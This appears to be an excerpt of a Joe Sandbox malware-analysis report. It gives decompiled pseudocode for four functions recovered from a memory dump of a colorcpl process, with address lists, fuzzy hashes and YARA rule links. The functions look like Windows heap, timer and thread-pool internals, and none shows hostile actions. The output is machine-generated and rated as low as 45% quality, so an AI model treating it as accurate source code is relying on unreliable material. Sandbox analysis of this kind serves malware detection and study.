Function 0435252B Relevance: .2, Instructions: 201
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0435252B(intOrPtr __ecx, intOrPtr* __edx) {
				unsigned int* _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* __ebx;
				intOrPtr _t74;
				unsigned int* _t76;
				intOrPtr* _t84;
				char* _t85;
				unsigned int* _t94;
				char* _t111;
				char* _t120;
				intOrPtr* _t133;
				signed int _t155;
				signed int _t158;
				signed int _t161;
				unsigned int _t169;
				unsigned int* _t171;
				intOrPtr _t173;
				signed int _t178;

				_t133 = __edx;
				_t173 = __ecx;
				_v20 =  *__edx;
				_t169 = __ecx - 0xa8 + (( *(__edx + 8) & 0x000000ff) << 5);
				_v24 = __ecx;
				_t74 =  *((intOrPtr*)(__ecx + 0xc));
				_v16 = _t74;
				if( *((intOrPtr*)(_t74 + 0xe8)) != 0) {
					if(( *(_t74 + 0x40) & 0x00000001) == 0) {
						E0434FED0( *((intOrPtr*)(_t74 + 0xc8)));
						_push( *((intOrPtr*)(_v20 + 0xc8)));
						E0434E740(0);
					}
				}
				_t155 =  *(_t169 + 4) & 0x0000ffff;
				_v12 = _t155;
				if(_t155 >  *((intOrPtr*)(_t169 + 0xc))) {
					_t76 = _t169 + 8;
					_v8 = _t76;
					if(_t155 <=  *_t76 >>  *(_t169 + 0x10)) {
						goto L2;
					} else {
						_t142 =  *(_t133 + 8);
						_t161 = 1 <<  *(_t133 + 8);
						if(1 > 0x78000) {
							_t161 = 0x78000;
						}
						_v16 = ( *(_t133 + 0xa) & 0x0000ffff) + _t161;
						E0433DD43( *((intOrPtr*)(_v24 + 0xc)), _t133, _t142);
						if(E04353C40() != 0) {
							_t111 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t111 = 0x7ffe0380;
						}
						if( *_t111 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000001) == 0) {
								goto L15;
							}
							_t135 = _v24;
							E043FF582(_v24,  *((intOrPtr*)(_v24 + 0xc)), _t133, _v16, ( *(_v20 + 0x14) & 0x0000ffff) << 3);
							goto L16;
						} else {
							L15:
							_t135 = _v24;
							L16:
							_t94 = _t169 + 8;
							asm("lock dec dword [eax]");
							if(_v12 != 0) {
								_t94 = E0436FE50(_t169);
								_t171 = _t94;
								if(_t171 != 0) {
									_t178 = 1 <<  *(_t171 + 8);
									if(_t178 > 0x78000) {
										_t178 = 0x78000;
									}
									_v12 = ( *(_t171 + 0xa) & 0x0000ffff) + _t178;
									asm("lock xadd [eax], ecx");
									E0433DD43( *((intOrPtr*)(_t135 + 0xc)), _t171,  ~(( *(_t171 + 0xa) & 0x0000ffff) + _t178));
									if(E04353C40() != 0) {
										_t120 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									} else {
										_t120 = 0x7ffe0380;
									}
									if( *_t120 != 0) {
										if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
											E043FF4FD(_t135,  *((intOrPtr*)(_t135 + 0xc)), _t171, _v12, 0);
											E043FF582(_t135,  *((intOrPtr*)(_t135 + 0xc)), _t171, _v12, 0);
										}
									}
									_t94 = _v8;
									asm("lock dec dword [eax]");
								}
							}
							L8:
							return _t94;
						}
					}
				}
				L2:
				_t158 = 1 <<  *(_t133 + 8);
				if(1 > 0x78000) {
					_t158 = 0x78000;
				}
				_v8 = ( *(_t133 + 0xa) & 0x0000ffff) + _t158;
				asm("lock xadd [eax], ecx");
				_t84 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t84 != 0) {
					if( *_t84 == 0) {
						goto L5;
					}
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					L6:
					if( *_t85 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							E043FF607(_t133,  *((intOrPtr*)(_t173 + 0xc)), _t133, _v8, ( *(_v20 + 0x14) & 0x0000ffff) << 3);
						}
					}
					L04352330(_t169 >> 0x00000002 & 0x0000001f, 0x4434f60 + (_t169 >> 0x00000002 & 0x0000001f) * 4);
					 *_t133 =  *_t169;
					 *(_t169 + 4) =  *(_t169 + 4) + 1;
					 *_t169 = _t133;
					E043524D0(0x4434f60 + (_t169 >> 0x00000002 & 0x0000001f) * 4);
					_t94 = 1;
					 *((intOrPtr*)(_t169 + 0x16)) =  *((intOrPtr*)(_t169 + 0x16)) + 1;
					goto L8;
				}
				L5:
				_t85 = 0x7ffe0380;
				goto L6;
			}

0x04352537
0x0435253a
0x04352541
0x04352552
0x04352554
0x04352558
0x0435255b
0x04352566
0x043526dd
0x043526e9
0x043526f2
0x043526f8
0x043526f8
0x043526dd
0x0435256c
0x04352573
0x04352579
0x043525f5
0x043525f8
0x04352605
0x00000000
0x0435260b
0x0435260b
0x04352618
0x0435261c
0x0435261e
0x0435261e
0x04352628
0x0435263c
0x04352648
0x043a60c4
0x0435264e
0x0435264e
0x0435264e
0x04352656
0x043a60db
0x00000000
0x00000000
0x043a60e7
0x043a60fd
0x00000000
0x0435265c
0x0435265c
0x0435265c
0x04352660
0x04352660
0x04352663
0x0435266b
0x04352673
0x04352678
0x0435267c
0x04352685
0x0435268e
0x04352690
0x04352690
0x0435269a
0x043526a3
0x043526ad
0x043526b9
0x043a6110
0x043526bf
0x043526bf
0x043526bf
0x043526c7
0x043a6127
0x043a6139
0x043a6146
0x043a6146
0x043a6127
0x043526cd
0x043526d1
0x043526d1
0x0435267c
0x043525ec
0x043525f2
0x043525f2
0x04352656
0x04352605
0x0435257b
0x04352586
0x0435258a
0x0435258c
0x0435258c
0x04352594
0x0435259d
0x043525a7
0x043525ac
0x043a6153
0x00000000
0x00000000
0x043a6162
0x043525b7
0x043525ba
0x043a6179
0x043a6197
0x043a6197
0x043a6179
0x043525d0
0x043525d7
0x043525d9
0x043525de
0x043525e0
0x043525e7
0x043525e8
0x00000000
0x043525e8
0x043525b2
0x043525b2
0x00000000

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4757b0e30ee736ecb789b7f2c309451063ea23831d50d9d93c5e6c3a589d7b8
Instruction ID: a686ae8d4fd6b6f400cff11b0115a4410728a94305f22590d9a6107a87a54ebf
Opcode Fuzzy Hash: d4757b0e30ee736ecb789b7f2c309451063ea23831d50d9d93c5e6c3a589d7b8
Instruction Fuzzy Hash: 0A71AD316046418FD311CF28C894B2BB7E5FF84704F0995AAE8998B761EB74E945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04347623 Relevance: .2, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E04347623(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char* _t69;
				intOrPtr _t71;
				intOrPtr _t74;
				intOrPtr _t75;
				signed int _t81;
				signed int _t82;
				signed int _t89;
				signed int _t90;
				void* _t97;
				intOrPtr _t99;
				intOrPtr _t101;
				intOrPtr _t102;
				intOrPtr _t113;
				intOrPtr _t119;
				intOrPtr _t120;
				intOrPtr _t130;
				intOrPtr _t132;
				signed int _t133;
				signed int _t135;
				intOrPtr _t138;
				intOrPtr _t141;
				intOrPtr _t142;
				intOrPtr _t143;
				intOrPtr _t144;
				intOrPtr _t145;
				intOrPtr _t146;
				void* _t160;

				_t145 = __edx;
				_t138 = __ecx;
				_v32 = __edx;
				_v28 = __ecx;
				if(E04353C40() != 0) {
					_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				} else {
					_t69 = 0x7ffe0386;
				}
				if( *_t69 != 0) {
					E04414F7C(((0 | _a4 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + _t145, _t138);
				}
				goto L3;
				do {
					do {
						L3:
						_t71 =  *0x44367f0; // 0x0
						_t130 =  *0x44367f4; // 0x0
						_v20 = _t71;
						_v8 = _t130;
						_v16 =  *0x7FFE03B4;
						_v12 =  *0x7ffe03b0;
						while(1) {
							_t146 =  *0x7ffe000c;
							_t99 =  *0x7FFE0008;
							if(_t146 ==  *0x7FFE0010) {
								goto L5;
							}
							asm("pause");
						}
						L5:
						_t132 = _v8;
						_t141 = _v16;
						_t74 =  *0x7ffe03b0;
						_t113 =  *((intOrPtr*)(0x7ffe03b4));
						_v24 = _t74;
					} while (_v12 != _t74 || _t141 != _t113);
					_t75 =  *0x44367f0; // 0x0
					_t142 =  *0x44367f4; // 0x0
					_v16 = _t142;
					_t143 = _v20;
				} while (_t143 != _t75 || _t132 != _v16);
				asm("sbb esi, ecx");
				_t101 = _t99 - _v24 - _t143;
				_t144 = _v28;
				asm("sbb esi, edx");
				_t20 = _t144 + 0x90; // 0x90
				L04352330(_t20, _t20);
				 *(_t144 + 0xde) = 0;
				if(( *(_t144 + 0xde) & 0x00000004) != 0) {
					_t60 = _t144 + 0x90; // 0x90
					 *(_t144 + 0xd8) = 0;
					 *((intOrPtr*)(_t144 + 0xc8)) = 0;
					 *((intOrPtr*)(_t144 + 0xcc)) = 0;
					 *((intOrPtr*)(_t144 + 0xd0)) = 0;
					E043524D0(_t60);
					_t81 = E044149D2( *((intOrPtr*)(_t144 + 0xd0)));
					L20:
					_t82 = _t81 | 0xffffffff;
					asm("lock xadd [edi], eax");
					if(_t82 == 0) {
						 *0x44391e0(_t144);
						return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t144 + 4))))))();
					}
					return _t82;
				}
				if( *((intOrPtr*)(_t144 + 0xdd)) != 0) {
					 *((intOrPtr*)(_t144 + 0xc8)) = 0;
					 *((intOrPtr*)(_t144 + 0xcc)) = 0;
					if(E0437CC67() != 0) {
						goto L18;
					}
					goto L19;
				} else {
					_t133 =  *(_t144 + 0xd8);
					if(_t133 != 0) {
						if(_a4 != 0) {
							_t119 = _t101;
							_v8 = _t146;
						} else {
							_t119 =  *((intOrPtr*)(_t144 + 0xc8));
							_v8 =  *((intOrPtr*)(_t144 + 0xcc));
						}
						_t89 = _t133;
						_t135 = _t89 * 0x2710 >> 0x20;
						_t90 = _t89 * 0x2710;
						_t120 = _t119 + _t90;
						_v12 = _t90;
						_t91 = _v8;
						asm("adc eax, edx");
						_v24 = 0x2710;
						_v28 = _t120;
						_v8 = _t91;
						 *((intOrPtr*)(_t144 + 0xc8)) = _t120;
						 *((intOrPtr*)(_t144 + 0xcc)) = _t91;
						_t160 = _t91 - _t146;
						if(_t160 <= 0 && (_t160 < 0 || _t120 <= _t101)) {
							asm("sbb eax, [ebp-0x4]");
							_t97 = E04386540(_t101 - _v28, _t146, _v12, _t135);
							_t91 = _v24;
							asm("sbb eax, edx");
							 *((intOrPtr*)(_t144 + 0xc8)) = _v12 - _t97 + _t101;
							asm("adc eax, esi");
							 *((intOrPtr*)(_t144 + 0xcc)) = _v24;
						}
						asm("lock inc dword [edi]");
						_t102 = _v32;
						L04352330(_t91, _t102);
						_t43 = _t102 + 0x50; // 0x50
						E043479D1(_t43, _t144);
						_t44 = _t102 + 0x50; // 0x50
						E043477F9(_t44, 0);
						E043524D0(_t102);
					}
					L18:
					E04351BE7(_t144);
					L19:
					_t45 = _t144 + 0x90; // 0x90
					_t81 = E043524D0(_t45);
					goto L20;
				}
			}

0x0434762e
0x04347630
0x04347632
0x04347635
0x0434763f
0x043a171a
0x04347645
0x04347645
0x04347645
0x0434764d
0x043a1737
0x043a1737
0x00000000
0x04347653
0x04347653
0x04347653
0x04347653
0x0434765d
0x04347663
0x04347666
0x04347673
0x04347676
0x0434767f
0x0434767f
0x04347681
0x04347687
0x00000000
0x00000000
0x043477f2
0x043477f2
0x0434768d
0x0434768d
0x04347695
0x04347698
0x0434769a
0x0434769d
0x043476a0
0x043476a9
0x043476ae
0x043476b4
0x043476b7
0x043476ba
0x043476c6
0x043476c8
0x043476ca
0x043476cd
0x043476cf
0x043476d6
0x043476e3
0x043476eb
0x043a1747
0x043a174e
0x043a1754
0x043a175a
0x043a1760
0x043a1766
0x043a176d
0x0434778a
0x0434778a
0x0434778d
0x04347791
0x043a177f
0x00000000
0x043a1785
0x0434779b
0x0434779b
0x043476f7
0x043477cf
0x043477d5
0x043477e4
0x00000000
0x00000000
0x00000000
0x043476fd
0x043476fd
0x04347705
0x0434770a
0x043477e8
0x043477ea
0x04347710
0x04347716
0x0434771c
0x0434771c
0x0434771f
0x04347726
0x04347726
0x04347728
0x0434772a
0x0434772d
0x04347730
0x04347732
0x04347735
0x04347738
0x0434773b
0x04347741
0x04347747
0x04347749
0x043477a9
0x043477ae
0x043477b8
0x043477bb
0x043477bf
0x043477c5
0x043477c7
0x043477c7
0x04347751
0x04347754
0x04347758
0x0434775f
0x04347762
0x04347769
0x0434776c
0x04347772
0x04347772
0x04347777
0x04347779
0x0434777e
0x0434777e
0x04347785
0x00000000
0x04347785

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e40fb3d2a0f22a8f3c5869e41f8df76d202c3685a0cc9f86640b59f747c64c61
Instruction ID: 08a90745336746f7804330d4007d3d0a10b17db6b3e6e03d458334fbeb89ae25
Opcode Fuzzy Hash: e40fb3d2a0f22a8f3c5869e41f8df76d202c3685a0cc9f86640b59f747c64c61
Instruction Fuzzy Hash: 40615C75A00506AFEB58DF78C480AADFBF6FF88344F25926AD419A7310DB34B9518F90

Uniqueness

Uniqueness Score: -1.00%

Function 043477F9 Relevance: .2, Instructions: 164
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E043477F9(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t63;
				signed int _t65;
				intOrPtr _t66;
				char* _t71;
				intOrPtr _t75;
				intOrPtr _t76;
				signed int _t80;
				intOrPtr _t81;
				void* _t85;
				char _t86;
				intOrPtr* _t87;
				intOrPtr _t89;
				void* _t95;
				intOrPtr _t98;
				void* _t100;
				void* _t105;
				signed int _t106;
				intOrPtr* _t110;
				void* _t111;
				intOrPtr* _t112;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr _t115;
				signed int _t116;
				void* _t128;

				_t118 = (_t116 & 0xfffffff8) - 0x4c;
				_v8 =  *0x443b370 ^ (_t116 & 0xfffffff8) - 0x0000004c;
				_t110 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t103 = __ecx[3];
				if(_t103 == 0) {
					_t58 =  *__ecx | __ecx[1];
					if(( *__ecx | __ecx[1]) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E04353C40() != 0) {
							_t63 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t63 = 0x7ffe0386;
						}
						if( *_t63 != 0) {
							E04414EC1(_t110);
						}
						_push(0);
						_push( *((intOrPtr*)(_t110 + 0x10)));
						_t58 = E043832F0();
					}
					L20:
					_pop(_t105);
					_pop(_t111);
					_pop(_t85);
					return E04384B50(_t58, _t85, _v8 ^ _t118, _t103, _t105, _t111);
				}
				_t65 = __ecx[2];
				_t86 =  *((intOrPtr*)(_t65 + 0x10));
				_t95 =  *((intOrPtr*)(_t103 + 0x10)) - _t86;
				_t106 =  *(_t65 + 0x14);
				_t66 =  *((intOrPtr*)(_t103 + 0x14));
				_t103 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t86;
				_v52 = _t106;
				_t58 = E04386310(_t95, _t66, 0x2710, 0);
				_v56 = _t58;
				if( *_t110 != _t86 ||  *(_t110 + 4) != _t106) {
					L3:
					 *(_t110 + 0x44) = _t58;
					_t103 = _t58 * 0x2710 >> 0x20;
					 *_t110 = _t86;
					 *(_t110 + 4) = _t106;
					_v20 = _t58 * 0x2710;
					_v16 = _t58 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t86;
						_v32 = _t106;
						if(E04353C40() != 0) {
							_t71 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t71 = 0x7ffe0386;
						}
						if( *_t71 != 0) {
							_t103 = _v40;
							E04415149(_t110, _v40, _t86, _t106);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_push( *((intOrPtr*)(_t110 + 0x10)));
						_t58 = E04384490();
						goto L20;
					} else {
						_t87 = 0x7ffe03b0;
						do {
							_t112 = 0x7ffe0010;
							do {
								_t75 =  *0x44367f0; // 0x0
								_v68 = _t75;
								_t76 =  *0x44367f4; // 0x0
								_v64 = _t76;
								_v72 =  *_t87;
								_v76 =  *((intOrPtr*)(_t87 + 4));
								while(1) {
									_t103 =  *0x7ffe000c;
									_t98 =  *0x7ffe0008;
									if(_t103 ==  *_t112) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t87 = 0x7ffe03b0;
								_t113 =  *0x7ffe03b0;
								_t80 =  *0x7FFE03B4;
								_v60 = _t113;
								_t112 = 0x7ffe0010;
								_v56 = _t80;
							} while (_v72 != _t113 || _v76 != _t80);
							_t81 =  *0x44367f0; // 0x0
							_t114 =  *0x44367f4; // 0x0
							_v76 = _t114;
							_t115 = _v68;
						} while (_t115 != _t81 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t100 = _t98 - _v60 - _t115;
						_t110 = _v48;
						_t89 = _v44;
						asm("sbb edx, eax");
						_t128 = _t103 - _v52;
						if(_t128 < 0 || _t128 <= 0 && _t100 <= _t89) {
							_t86 = _t100 - _t89;
							asm("sbb edx, edi");
							_t106 = _t103;
						} else {
							_t86 = 0;
							_t106 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t110 + 0x44) == _t58) {
						goto L20;
					}
					goto L3;
				}
			}

0x04347801
0x0434780b
0x04347811
0x04347813
0x04347819
0x0434781e
0x04347822
0x04347827
0x04347996
0x04347999
0x0434799b
0x0434799d
0x043479a7
0x043a1795
0x043479ad
0x043479ad
0x043479ad
0x043479b4
0x043479c3
0x043479c3
0x043479b6
0x043479b7
0x043479ba
0x043479ba
0x04347978
0x0434797c
0x0434797d
0x0434797e
0x04347989
0x04347989
0x0434782d
0x04347835
0x04347838
0x0434783a
0x0434783d
0x04347840
0x04347846
0x04347848
0x0434784e
0x04347852
0x04347857
0x0434785d
0x04347868
0x0434786d
0x04347870
0x04347877
0x04347879
0x0434787c
0x04347880
0x04347884
0x04347941
0x04347941
0x04347945
0x04347950
0x043a17b1
0x04347956
0x04347956
0x04347956
0x0434795e
0x043a17bb
0x043a17c3
0x043a17c3
0x04347968
0x04347969
0x0434796f
0x04347970
0x04347973
0x00000000
0x0434788a
0x0434788a
0x04347894
0x04347894
0x04347899
0x04347899
0x0434789e
0x043478a2
0x043478a7
0x043478ad
0x043478b9
0x043478bd
0x043478bd
0x043478bf
0x043478c5
0x00000000
0x00000000
0x043479ca
0x043479ca
0x043478cb
0x043478cb
0x043478d0
0x043478d2
0x043478d9
0x043478dd
0x043478e2
0x043478e2
0x043478ee
0x043478f3
0x043478f9
0x043478fd
0x04347901
0x04347917
0x0434791b
0x0434791d
0x04347921
0x04347925
0x04347927
0x04347929
0x0434793b
0x0434793d
0x0434793f
0x043a179f
0x043a179f
0x043a17a1
0x043a17a1
0x00000000
0x04347929
0x0434798a
0x0434798d
0x00000000
0x00000000
0x00000000
0x0434798f

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5a89e8f989fa3ec2d5919656e7171ff4eb995e2b228b2171483849a1aabae83
Instruction ID: 2173a798e32c3460d927bb56dc692a3e1084745a84be0986f7ce3998a1870045
Opcode Fuzzy Hash: f5a89e8f989fa3ec2d5919656e7171ff4eb995e2b228b2171483849a1aabae83
Instruction Fuzzy Hash: 39516971A08701DFD724DF69C080A2ABBE9FBC8754F10596EE99997350E730F844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0437B490 Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E0437B490(void* __ecx, signed int __edx, char _a4) {
				signed int _v8;
				intOrPtr _v20;
				intOrPtr _v100;
				intOrPtr _v104;
				char _v120;
				signed int _v124;
				char _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				char _v140;
				void* _v148;
				intOrPtr _v156;
				intOrPtr _v160;
				char _v168;
				signed int _v180;
				void* _v184;
				void* _v192;
				void* _v200;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t62;
				void* _t72;
				signed int _t81;
				signed int _t82;
				intOrPtr _t101;
				signed char _t102;
				signed int _t110;
				signed char _t113;
				signed int _t117;
				signed int _t121;
				intOrPtr _t122;
				void* _t125;
				char _t127;
				void* _t129;
				signed int _t134;
				signed int _t135;
				signed int _t137;
				void* _t141;

				_t124 = __edx;
				_t137 = (_t135 & 0xfffffff8) - 0xc4;
				_v8 =  *0x443b370 ^ _t137;
				_push(_t129);
				_t110 = 0;
				_push(0);
				_push(4);
				_push( &_v192);
				_push(0xc);
				_push(0xfffffffe);
				_v192 = 0;
				_t62 = E04382C00();
				_t127 = _a4;
				if(_t62 < 0) {
					L2:
					E0435F640(_t110, _t127, _t129, _t140);
					E0437B500(_t110, _t127, _t129, _t140, _t110);
					_push(_t127);
					_push(_t110);
					E04382EE0();
					L8:
					_t141 =  *0x44341d4 - _t110; // 0x0
					if(_t141 == 0) {
						L21:
						_t117 = ( *( *[fs:0x18] + 0xfca) & 0x0000ffff) >> 0x0000000c & 0x00000001;
						E043619DF(_t117);
						E04362755(_t124);
						E0434FED0(0x4435b40);
						E0436DAC0(_t117,  *((intOrPtr*)( *[fs:0x30] + 0x18)));
						_push(_t127);
						_push(_t110);
						_t72 = E04382C70();
						_t148 = _t72;
						if(_t72 >= 0) {
							E0436D9CE();
							_push(0x4435b40);
							 *0x4435b4c =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *0x4435b44 = 0xfffffffe;
							 *0x4435b48 = 1;
							 *0x4435b50 = _t110;
							E0434E740(_t117);
							E0436D940(_t117, 0xffffffff, _t127);
							E0436D6D0(_t110, _t127, 0x4435b40, _t148);
							_push(_t127);
							_push(0xffffffff);
							E04382C70();
						}
						E0436DA20(_t117,  *((intOrPtr*)( *[fs:0x30] + 0x18)));
						_push(0x4435b40);
						E0434E740(_t117);
						_push(_t117);
						_push(_t110);
						_t125 = 0x12;
						E0436270D(_t125);
						_push(_t127);
						_push(0xfffffffe);
						E04382EE0();
						asm("int3");
						_push(_t110);
						_push(_t110);
						_push(0x818);
						_push( &_v124);
						_push(0xffffffff);
						_push(_t127);
						_push(0xffffffff);
						if(E04382D70() >= 0) {
							_push(_t110);
							_push(0x1c);
							_push( &_v168);
							_push(_t110);
							_push(_v124);
							_t81 = E04382C00();
							__eflags = _t81;
							if(_t81 < 0) {
								goto L5;
							}
							_t82 =  *0x04435B60;
							__eflags = _t82 - _v160;
							if(_t82 != _v160) {
								goto L5;
							}
							_t82 =  *0x04435B64;
							__eflags = _t82 - _v156;
							if(_t82 == _v156) {
								__eflags =  *0x04436AD0 - _t110;
								L4:
								_t8 = __eflags != 0;
								__eflags = _t8;
								_t110 = _t110 & 0xffffff00 | _t8;
								goto L5;
							}
							_v140 =  &_v128;
							_v132 = 4;
							_v136 = 0xf90;
							_push(_t110);
							_push(0xc);
							_push( &_v140);
							_push(0x1a);
							_push(_v124);
							_t82 = E04382C00();
							__eflags = _t82;
							if(_t82 < 0) {
								goto L5;
							}
							__eflags = _v128 - _t110;
							goto L4;
						} else {
							_v124 = _t110;
							L5:
							if(_v124 != 0) {
								_push(_v124);
								_t82 = E04382A80();
							}
							if(_t110 != 0) {
								E043CEF10(0x54, 0, "ThreadPool: attempt to terminate a worker thread via handle %p\nContact the owner of the function calling Terminate/Exit thread.\n", _t127);
								E04388F40( &_v120, 0, 0x50);
								_v120 = 0xc000071c;
								_v104 = 1;
								_v100 = _t127;
								_v8 = 0;
								_push( &_v120);
								_t82 = L04398A60(_t117, _t125);
								_v8 = 0xfffffffe;
							}
							 *[fs:0x0] = _v20;
							return _t82;
						}
					}
					E04388F40(_t137 + 0x18, _t110, 0xb0);
					_t137 = _t137 + 0xc;
					 *((intOrPtr*)(_t137 + 0x18)) = 0xb0;
					 *((intOrPtr*)(_t137 + 0x44)) = 0x20000;
					_t134 = _t110;
					do {
						_t121 = _t134 & 0xffff7fff;
						 *(_t137 + 0x10) = _t121;
						if( *0x44341d4 == 0) {
							goto L19;
						}
						if(_t121 < 0x40) {
							L14:
							asm("lock inc dword [eax]");
							_t101 =  *0x44341d4; // 0x0
							_t102 =  *(_t101 + _t121 * 8);
							if((_t102 & 0x00000001) == 0) {
								_t113 = _t102;
								__eflags = 0;
								if(0 == 0) {
									_t124 =  *(_t113 + 0xd4);
									_t122 =  *((intOrPtr*)(_t113 + 0x14));
									asm("lock dec dword [eax+ecx*8+0x4]");
									__eflags = _t124 & 0x00000400;
									if((_t124 & 0x00000400) == 0) {
										_t28 = _t137 + 0x24;
										 *_t28 =  *(_t137 + 0x24) & 0x00000000;
										__eflags =  *_t28;
										_v180 = _t134;
										E0437D883(_t122, _t137 + 0x18);
									}
								}
							} else {
								asm("lock dec dword [eax+ecx*8+0x4]");
							}
							goto L19;
						}
						_t124 = _t137 + 0x10;
						if(E04411712(_t134, _t137 + 0x10) != 0) {
							goto L19;
						}
						_t121 =  *(_t137 + 0x10);
						goto L14;
						L19:
						_t134 = _t134 + 1;
					} while (_t134 < 0x40);
					_t110 = 0;
					goto L21;
				}
				_t140 = _v192;
				if(_v192 != 0) {
					goto L8;
				}
				goto L2;
			}

0x0437b490
0x0437b498
0x0437b4a5
0x0437b4ad
0x0437b4af
0x0437b4b5
0x0437b4b6
0x0437b4b8
0x0437b4b9
0x0437b4bb
0x0437b4bd
0x0437b4c1
0x0437b4c6
0x0437b4cb
0x0437b4d7
0x0437b4d7
0x0437b4dd
0x0437b4e2
0x0437b4e3
0x0437b4e4
0x043b70fd
0x043b70fd
0x043b7103
0x043b71c5
0x043b71d5
0x043b71d8
0x043b71dd
0x043b71e8
0x043b71f6
0x043b71fb
0x043b71fc
0x043b71fd
0x043b7202
0x043b7204
0x043b7206
0x043b7211
0x043b7215
0x043b721a
0x043b7224
0x043b722e
0x043b7234
0x043b723c
0x043b7241
0x043b7246
0x043b7247
0x043b7249
0x043b7249
0x043b7257
0x043b725c
0x043b725d
0x043b7262
0x043b7263
0x043b7266
0x043b7267
0x043b726c
0x043b726d
0x043b726f
0x043b7274
0x043b7275
0x043b7276
0x043b7277
0x043b727f
0x043b7280
0x043b7282
0x043b7283
0x043b728c
0x043b7296
0x043b7297
0x043b729f
0x043b72a0
0x043b72a1
0x043b72a4
0x043b72a9
0x043b72ab
0x00000000
0x00000000
0x043b72b1
0x043b72b4
0x043b72ba
0x00000000
0x00000000
0x043b72c0
0x043b72c3
0x043b72c9
0x0437b529
0x0437b52f
0x0437b52f
0x0437b52f
0x0437b52f
0x00000000
0x0437b52f
0x043b72d2
0x043b72d8
0x043b72df
0x043b72e9
0x043b72ea
0x043b72f2
0x043b72f3
0x043b72f5
0x043b72f8
0x043b72fd
0x043b72ff
0x00000000
0x00000000
0x043b7305
0x00000000
0x043b728e
0x043b728e
0x0437b532
0x0437b536
0x043b730d
0x043b7310
0x043b7310
0x0437b53e
0x043b7325
0x043b7331
0x043b7339
0x043b7340
0x043b7347
0x043b734a
0x043b7350
0x043b7351
0x043b7364
0x043b7364
0x0437b547
0x0437b553
0x0437b553
0x043b728c
0x043b7115
0x043b711a
0x043b711d
0x043b7121
0x043b7129
0x043b712f
0x043b7131
0x043b713e
0x043b7142
0x00000000
0x00000000
0x043b7147
0x043b715c
0x043b7167
0x043b716a
0x043b716f
0x043b7174
0x043b7182
0x043b7186
0x043b7188
0x043b718a
0x043b7190
0x043b7198
0x043b719d
0x043b71a3
0x043b71a5
0x043b71a5
0x043b71a5
0x043b71b0
0x043b71b4
0x043b71b4
0x043b71a3
0x043b7176
0x043b717b
0x043b717b
0x00000000
0x043b7174
0x043b7149
0x043b7156
0x00000000
0x00000000
0x043b7158
0x00000000
0x043b71b9
0x043b71b9
0x043b71ba
0x043b71c3
0x00000000
0x043b71c3
0x0437b4cd
0x0437b4d1
0x00000000
